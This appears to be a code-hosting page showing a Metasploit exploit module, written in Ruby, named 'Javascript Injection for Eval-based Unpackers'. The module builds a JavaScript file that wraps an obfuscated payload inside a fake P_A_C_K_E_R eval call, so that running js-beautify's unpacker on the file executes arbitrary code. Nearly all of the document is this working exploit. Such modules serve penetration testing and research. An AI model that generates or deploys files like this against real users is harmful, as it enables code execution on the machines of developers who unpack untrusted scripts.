modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb from rapid7/metasploit-framework

modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb

Summary

Maintainability

0 mins

Test Coverage

Issues

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::JSObfu

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Javascript Injection for Eval-based Unpackers',
      'Description'    => %q{
        This module generates a Javascript file that executes arbitrary code
        when an eval-based unpacker is run on it. Works against js-beautify's
        P_A_C_K_E_R unpacker.
      },
      'Author'         => [ 'joev' ],
      'License'        => MSF_LICENSE,
      'References'  =>
        [
        ],
      'Platform'       => 'nodejs',
      'Arch'           => ARCH_NODEJS,
      'Privileged'     => false,
      'Targets'        =>    [['Automatic', {}]],
      'DisclosureDate' => '2015-02-18',
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('FILENAME', [true, 'The file name.', 'msf.js']),
      OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.'])
    ])
  end

  def exploit
    p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded);
    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))")
  end
end